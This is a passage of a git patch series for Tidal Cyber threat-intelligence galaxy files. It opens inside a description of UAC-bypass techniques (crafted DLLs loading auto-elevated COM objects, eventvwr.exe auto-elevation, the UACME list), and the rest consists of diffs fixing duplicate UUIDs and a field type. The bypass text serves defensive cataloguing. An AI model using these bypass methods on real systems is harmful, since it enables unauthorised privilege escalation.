crafted DLL which loads an auto-elevated [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.[[Davidson Windows](https://app.tidalcyber.com/references/49af01f2-06c5-4b21-9882-901ad828ee28)]\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods[[Github UACMe](https://app.tidalcyber.com/references/7006d59d-3b61-4030-a680-5dac52133722)] that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe can auto-elevate and execute a specified binary or script.[[enigma0x3 Fileless UAC Bypass](https://app.tidalcyber.com/references/74b16ca4-9494-4f10-97c5-103a8521818f)][[Fortinet Fareit](https://app.tidalcyber.com/references/d06223d7-2d86-41c6-af23-50865a1810c0)]\n\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.[[SANS UAC Bypass](https://app.tidalcyber.com/references/824739ac-633a-40e0-bb01-2bfd43714d67)]", diff --git a/tools/tidal-api/config/campaigns.json b/tools/tidal-api/config/campaigns.json index 408476e..2a8bbc4 100644 --- a/tools/tidal-api/config/campaigns.json +++ b/tools/tidal-api/config/campaigns.json @@ -4,7 +4,7 @@ "namespace": "tidal", "description": "Tidal Campaigns Galaxy", "type": "campaigns", - "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "uuid": "3db4b6cb-5b89-4096-a057-e0205777adc9", "icon": "bullhorn" }, "cluster": { diff --git a/tools/tidal-api/config/groups.json b/tools/tidal-api/config/groups.json index f54a60c..62d50b5 100644 --- a/tools/tidal-api/config/groups.json +++ b/tools/tidal-api/config/groups.json @@ -4,7 +4,7 @@ "namespace": "tidal", "description": "Tidal Groups Galaxy", "type": "groups", - "uuid": "41c3e5c0-de5c-4edb-b48b-48cd8e7519e6", + "uuid": "877cdc4b-3392-4353-a7d4-2e46d40e5936", "icon": "user-secret" }, "cluster": { diff --git a/tools/tidal-api/config/references.json b/tools/tidal-api/config/references.json index 037b034..a2071c6 100644 --- a/tools/tidal-api/config/references.json +++ b/tools/tidal-api/config/references.json @@ -4,7 +4,7 @@ "namespace": "tidal", "description": "Tidal References Galaxy", "type": "references", - "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "uuid": "efd98ec4-16ef-41c4-bc3c-60c7c1ae8b39", "icon": "list" }, "cluster": { diff --git a/tools/tidal-api/config/software.json b/tools/tidal-api/config/software.json index f2070dd..ed0e548 100644 --- a/tools/tidal-api/config/software.json +++ b/tools/tidal-api/config/software.json @@ -4,7 +4,7 @@ "namespace": "tidal", "description": "Tidal Software Galaxy", "type": "software", - "uuid": "38d62d8b-4c49-489a-9bc4-8e294c4f04f7", + "uuid": "6eb44da4-ed4f-4a5d-a444-0f105ff1b3c2", "icon": "file-code" }, "cluster": { diff --git a/tools/tidal-api/config/tactic.json b/tools/tidal-api/config/tactic.json index d2a845d..260d37c 100644 --- a/tools/tidal-api/config/tactic.json +++ b/tools/tidal-api/config/tactic.json @@ -4,7 +4,7 @@ "namespace": "tidal", "description": "Tidal Tactic Galaxy", "type": "tactic", - "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "uuid": "16b963e7-4b88-44e0-b184-16bf9e71fdc9", "icon": "map" }, "cluster": { diff --git a/tools/tidal-api/config/technique.json b/tools/tidal-api/config/technique.json index debdda0..b192d04 100644 --- a/tools/tidal-api/config/technique.json +++ b/tools/tidal-api/config/technique.json @@ -4,7 +4,7 @@ "namespace": "tidal", "description": "Tidal Technique Galaxy", "type": "technique", - "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "uuid": "298b6aee-981b-4fd8-8759-a2e72ad223fa", "icon": "user-ninja" }, "cluster": { diff --git a/tools/tidal-api/models/cluster.py b/tools/tidal-api/models/cluster.py index df22826..77f60eb 100644 --- a/tools/tidal-api/models/cluster.py +++ b/tools/tidal-api/models/cluster.py @@ -62,7 +62,7 @@ class SubTechniqueMeta(Meta): class TacticMeta(Meta): source: str = None tactic_attack_id: str = None - ordinal_position: int = None + ordinal_position: str = None tags: list = None owner: str = None @@ -531,7 +531,7 @@ class TacticCluster(Cluster): meta = TacticMeta( source=entry.get("source"), tactic_attack_id=entry.get("tactic_attack_id"), - ordinal_position=entry.get("ordinal_position"), + ordinal_position=str(entry.get("ordinal_position")), tags=[x.get("tag") for x in entry.get("tags")], owner=entry.get("owner_name"), ) From c2cfffc593ab4adc7e4c11fafdae5065d50bd653 Mon Sep 17 00:00:00 2001 From: niclas Date: Wed, 6 Mar 2024 09:54:37 +0100 Subject: [PATCH 49/49] Fix [galaxies] typo --- galaxies/tidal-campaigns.json | 2 +- galaxies/tidal-groups.json | 2 +- galaxies/tidal-references.json | 2 +- galaxies/tidal-software.json | 2 +- galaxies/tidal-tactic.json | 2 +- galaxies/tidal-technique.json | 2 +- 6 files changed, 6 insertions(+), 6 deletions(-) diff --git a/galaxies/tidal-campaigns.json b/galaxies/tidal-campaigns.json index 702e518..d53cf6f 100644 --- a/galaxies/tidal-campaigns.json +++ b/galaxies/tidal-campaigns.json @@ -4,6 +4,6 @@ "name": "Tidal Campaigns", "namespace": "tidal", "type": "campaigns", - "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "uuid": "3db4b6cb-5b89-4096-a057-e0205777adc9", "version": 1 } diff --git a/galaxies/tidal-groups.json b/galaxies/tidal-groups.json index 5bda54a..3e1fab1 100644 --- a/galaxies/tidal-groups.json +++ b/galaxies/tidal-groups.json @@ -4,6 +4,6 @@ "name": "Tidal Groups", "namespace": "tidal", "type": "groups", - "uuid": "41c3e5c0-de5c-4edb-b48b-48cd8e7519e6", + "uuid": "877cdc4b-3392-4353-a7d4-2e46d40e5936", "version": 1 } diff --git a/galaxies/tidal-references.json b/galaxies/tidal-references.json index 7ff95cb..468e1cd 100644 --- a/galaxies/tidal-references.json +++ b/galaxies/tidal-references.json @@ -4,6 +4,6 @@ "name": "Tidal References", "namespace": "tidal", "type": "references", - "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "uuid": "efd98ec4-16ef-41c4-bc3c-60c7c1ae8b39", "version": 1 } diff --git a/galaxies/tidal-software.json b/galaxies/tidal-software.json index 7686bff..f68654a 100644 --- a/galaxies/tidal-software.json +++ b/galaxies/tidal-software.json @@ -4,6 +4,6 @@ "name": "Tidal Software", "namespace": "tidal", "type": "software", - "uuid": "38d62d8b-4c49-489a-9bc4-8e294c4f04f7", + "uuid": "6eb44da4-ed4f-4a5d-a444-0f105ff1b3c2", "version": 1 } diff --git a/galaxies/tidal-tactic.json b/galaxies/tidal-tactic.json index 55edb06..99f7c3b 100644 --- a/galaxies/tidal-tactic.json +++ b/galaxies/tidal-tactic.json @@ -4,6 +4,6 @@ "name": "Tidal Tactic", "namespace": "tidal", "type": "tactic", - "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "uuid": "16b963e7-4b88-44e0-b184-16bf9e71fdc9", "version": 1 } diff --git a/galaxies/tidal-technique.json b/galaxies/tidal-technique.json index f1571ac..d7e61e6 100644 --- a/galaxies/tidal-technique.json +++ b/galaxies/tidal-technique.json @@ -4,6 +4,6 @@ "name": "Tidal Technique", "namespace": "tidal", "type": "technique", - "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "uuid": "298b6aee-981b-4fd8-8759-a2e72ad223fa", "version": 1 }